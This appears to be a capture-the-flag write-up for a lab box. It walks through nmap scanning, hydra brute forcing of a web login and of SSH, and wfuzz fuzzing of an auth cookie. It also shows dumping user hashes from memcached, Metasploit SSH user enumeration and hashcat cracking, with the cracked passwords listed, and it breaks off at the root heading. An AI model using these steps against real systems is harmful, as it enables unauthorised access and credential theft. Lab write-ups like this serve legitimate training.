Information Gathering . Getting User . Getting Root Informati

1. Information Gathering
2. . Getting User
3. . Getting Root
4.  
5.  
6.  
7.  
8.  
9.  
10. Information Gathering
11.  
12. As usually, we start with nmap to see which ports are open on the server.
13.  
14. $ mkdir nmap
15.  
16. $ nmap -sV -oA nmap/initial 10.10.10.86
17.  
18. ...
19.  
20. PORT STATE SERVICE VERSION
21.  
22. 21/tcp open ftp vsftpd 3.0.3
23.  
24. 22/tcp open tcpwrapped
25.  
26. 80/tcp open http nginx 1.10.3 (Ubuntu)
27.  
28. 8080/tcp open http nginx 1.10.3 (Ubuntu)
29.  
30. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
31.  
32. ...
33.  
34. If script enumeration was activated with the -sC option, we would notice that the FTP anonymous
35. login was enabled. The FTP server contains an image which includes steganography (a text file
36. hidden with a blank password, which outputs “Nope...”, in other words, a troll).
37.  
38. Next, let’s check the web server running in port 80:
39.  
40.  
41.  
42. The root page redirects us to /login which requires credentials. If the wrong credentials are
43. entered, the server will respond with an Error: Login failed message. Therefore, we will try
44. brute forcing with hydra with the username of admin, since it is the most common one.
45.  
46. 
47. $ hydra -s 80 -l 'admin' -P
48. /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt 10.10.10.86
49. http-post-form "/login:username=^USER^&password=^PASS^:F=Error: Login failed"
50.  
51. I usually use the SecLists password wordlists first when brute forcing services remotely before
52. firing up the huge rockyou wordlist file. Eventually, we should have a password which turns out
53. to be Password1. After logging in, we are presented with some stock items from a MySQL database
54. (as denoted in the HTML source code). We notice a cookie will be set for both websites running
55. in port 80 and 8080:
56.  
57. Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0.DmQDCQ.s5VT7anp8pazB-MBLM5bGS4NNL8
58.  
59. I found nothing more of interest in the website of port 80, so I switched to 8080. This is the HTTP
60. request header by default (after retrieving the session cookie):
61.  
62. GET / HTTP/1.1
63.  
64. Host: 10.10.10.86:8080
65.  
66. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
67.  
68. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
69.  
70. Accept-Language: en-US,en;q=0.5
71.  
72. Accept-Encoding: gzip, deflate
73.  
74. Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0.DmQDCQ.s5VT7anp8pazB-MBLM5bGS4NNL8
75.  
76. Connection: close
77.  
78. Upgrade-Insecure-Requests: 1
79.  
80. Which gives us the following message:
81.  
82. Access denied: password authentication cookie not set
83.  
84. Using Burp, I manually added another cookie with a random value to see if the response changes:
85.  
86. Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0.DmQDCQ.s5VT7anp8pazB-MBLM5bGS4NNL8;
87. password=test
88.  
89. And now we get a different message:
90.  
91. Access denied: password authentication cookie incorrect
92.  
93. It seems that we passed the first step, but now we need to find the right value for the password
94. cookie. I will use wfuzz for that and filter out reponses which have a character length of 324, which
95. was the reponse length of an incorrect cookie.
96.  
97. $ wfuzz -z file,/usr/share/wordlists/SecLists/Passwords/darkweb2017-
98. top10000.txt -b password=FUZZ --hh 324 http://10.10.10.86:8080/
99.  
100. ...
101.  
102.  
103. 000211: C=200 21 L 48 W 540 Ch "secret"
104.  
105.  
106. ...
107.  
108.  
109.  
110.  
111. 
112. We got a different response length with password=secret cookie, and if we modify the request in
113. Burp to this value and forward that packet, we get the following:
114.  
115.  
116.  
117. The fact that a cache engine is being mentioned is a huge hint. A quick google will eventually
118. lead us to the memcached software which is a key-based cache that stores data and objects
119. wherever spare RAM is available for quick access by applications, without going through layers
120. of parsing or disk I/O. According to MySQL and memcached guide, by default, memcached uses
121. the following settings:
122.  
123. • Memory allocation of 64MB
124. • Listens for connections on all network interfaces, using port 11211
125. • Supports a maximum of 1024 simultaneous connections
126.  
127.  
128. We already have a potential TCP port number input that we can use to retrieve results. We can
129. confirm this, because if we try port numbers other than 11211, we will get an internal server error.
130.  
131. Next, we need to know what line to send. For that, we will refer to the github wiki of memcached
132. commands and the guide I mentioned above, specifically article 5.2 to get the slabs statistic. Based
133. on the document, the stats slabs command retrieves slabs which have been allocated for storing
134. information within the cache. If we run the command in the web interface, we get this output:
135.  
136. STAT 16:chunk_size 2904
137.  
138. STAT 16:chunks_per_page 361
139.  
140. STAT 16:total_pages 1
141.  
142. STAT 16:total_chunks 361
143.  
144. STAT 16:used_chunks 0
145.  
146. STAT 16:free_chunks 361
147.  
148. STAT 16:free_chunks_end 0
149.  
150. STAT 16:mem_requested 0
151.  
152. STAT 16:get_hits 32
153.  
154. STAT 16:cmd_set 25
155.  
156. STAT 16:delete_hits 0
157.  
158. STAT 16:incr_hits 0
159.  
160. 
161. STAT 16:decr_hits 0
162.  
163. STAT 16:cas_hits 0
164.  
165. STAT 16:cas_badval 0
166.  
167. STAT 16:touch_hits 0
168.  
169. STAT 26:chunk_size 27120
170.  
171. STAT 26:chunks_per_page 38
172.  
173. STAT 26:total_pages 1
174.  
175. STAT 26:total_chunks 38
176.  
177. STAT 26:used_chunks 1
178.  
179. STAT 26:free_chunks 37
180.  
181. STAT 26:free_chunks_end 0
182.  
183. STAT 26:mem_requested 24699
184.  
185. STAT 26:get_hits 45258
186.  
187. STAT 26:cmd_set 262
188.  
189. STAT 26:delete_hits 0
190.  
191. STAT 26:incr_hits 0
192.  
193. STAT 26:decr_hits 0
194.  
195. STAT 26:cas_hits 0
196.  
197. STAT 26:cas_badval 0
198.  
199. STAT 26:touch_hits 0
200.  
201. STAT active_slabs 2
202.  
203. STAT total_malloced 2078904
204.  
205. END
206.  
207. Each slab (in this case two active slabs) are assigned an unique ID (16 and 26). As seen in the
208. output, quite a lot of space (27120) is allocated to the second chunk (with an ID of 26). Let’s try
209. and dump the keys for this slab class using the stats cachedump 26 0 command, where 26 is the
210. ID of the slab and 0 indicates no result limit. The output:
211.  
212. ITEM users [24625 b; 1535279887 s]
213.  
214. END
215.  
216. We get a key item called users, which we can retrieve its data with the get users command:
217.  
218.  
219.  
220.  
221.  
222. 
223. Getting User
224.  
225. We will save the JSON output to a file called get-users.txt and then use the json.tool python
226. module to format the text:
227.  
228. $ cat get-users.txt | python -m json.tool > beautify.txt
229.  
230.  
231.  
232. We will now extract the usernames and MD5 hashes from beautify.txt:
233.  
234. $ cat beautify.txt | cut -d ":" -f 1 | cut -d '"' -f 2 > users.txt
235.  
236. $ cat beautify.txt | cut -d ":" -f 2 | cut -d '"' -f 2 > hashes.txt
237.  
238. Open an editor and delete the first and the last line for both of these files (the JSON brackets).
239.  
240. To make things easier and quicker, we will use the Metasploit framework to enumerate SSH users
241. with our users.txt list using the auxiliary/scanner/ssh/ssh_enumusers module:
242.  
243. $ msfconsole -q
244.  
245. msf > use auxiliary/scanner/ssh/ssh_enumusers
246.  
247. msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 10.10.10.86
248.  
249. msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE files/users.txt
250.  
251. msf auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 10
252.  
253. msf auxiliary(scanner/ssh/ssh_enumusers) > run
254.  
255. [*] 10.10.10.86:22 - SSH - Using malformed packet technique
256.  
257. [*] 10.10.10.86:22 - SSH - Starting scan
258.  
259. ...
260.  
261. [+] 10.10.10.86:22 - SSH - User 'genevieve' found
262.  
263. ...
264.  
265.  
266.  
267.  
268.  
269.  
270.  
271. 
272. Let’s also try to crack some of the MD5 hashes from our hashes.txt file using hashcat:
273.  
274. $ hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt -o cracked.txt –
275. force
276.  
277. ...
278.  
279. 2ac9cb7dc02b3c0083eb70898e549b63:Password1
280.  
281. 9731e89f01c1fb943cf0baa6772d2875:piggy
282.  
283. 6f9ff93a26a118b460c878dc30e17130:monkeyman
284.  
285. eb95fc1ab8251cf1f8f870e7e4dae54d:megadeth
286.  
287. 1e0ad2ec7e8c3cc595a9ec2e3762b117:blaster
288.  
289. 5177790ad6df0ea98db41b37b602367c:strength
290.  
291. 0ef9c986fad340989647f0001e3555d4:misfits
292.  
293. 0daa6275280be3cf03f9f9c62f9d26d1:lovesucks1
294.  
295. fc7992e8952a8ff5000cb7856d8586d2:Princess1
296.  
297. c21f969b5f03d33d43e04f8f136e7682:default
298.  
299. 254e5f2c3beb1a3d03f17253c15c07f3:hacktheplanet
300.  
301. fe01ce2a7fbac8fafaed7c982a04e229:demo
302.  
303. ...
304.  
305. $ cat cracked.txt | cut -d ":" -f 2 > passwords.txt
306.  
307. The process will finish quickly as these 12 hashes are well-known and other hashes will be ignored.
308. Otherwise, you would have to specify the -a 3 option of hashcat to try and crack every hash.
309.  
310. Now that we have a valid user (genevieve) and an extracted password list, let’s brute force the
311. SSH service using hydra and then login to grab the user flag after successfully retrieving the
312. password:
313.  
314. $ hydra -l 'genevieve' -P passwords.txt 10.10.10.86 ssh
315.  
316. ...
317.  
318. [22][ssh] host: 10.10.10.86 login: genevieve password: Princess1
319.  
320. ...
321.  
322. $ sudo apt install sshpass
323.  
324. $ sshpass -p 'Princess1' ssh genevieve@10.10.10.86
325.  
326. Getting Root